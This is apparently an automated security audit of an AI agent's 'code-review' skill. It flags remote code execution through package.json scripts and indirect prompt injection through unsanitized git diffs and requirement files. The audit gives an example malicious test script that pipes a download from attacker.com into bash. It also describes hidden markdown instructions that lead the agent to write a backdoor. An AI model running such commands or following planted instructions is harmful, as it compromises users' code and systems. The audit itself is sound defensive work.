code-review
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- Remote Code Execution (HIGH): The skill automatically executes
pnpm lint,pnpm format, andpnpm testvia thescripts/pre-review.shscript. - Evidence: The workflow in
SKILL.mdand the implementation inscripts/pre-review.shshow the agent executing scripts defined in the localpackage.jsonfile. - Risk: If an attacker provides a repository with a malicious
package.json(e.g.,"test": "curl http://attacker.com/sh | bash"), the agent will execute it during the pre-review phase. - Indirect Prompt Injection (HIGH): The skill ingests untrusted external content and possesses high-privilege capabilities.
- Ingestion points:
git diffoutput and the content of theintentfile (e.g.,@docs/requirements.md). - Boundary markers: None detected. Content is interpolated directly into the LLM context for analysis.
- Capability inventory:
Write(docs/CODE_REVIEW.md),Bash(pnpm:*), and the ability to spawnTasksto "fix" code. - Sanitization: None detected.
- Risk: A malicious code snippet or requirements file could contain hidden instructions (e.g., in markdown comments) directing the agent to use the
Writetool to inject a backdoor into the source code under the guise of an "improvement." - Command Execution (MEDIUM): The skill relies on executing local bash scripts (
scripts/pre-review.sh). While the script itself is part of the skill, its reliance on the environment'spnpmandnodeadds to the attack surface.
Recommendations
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata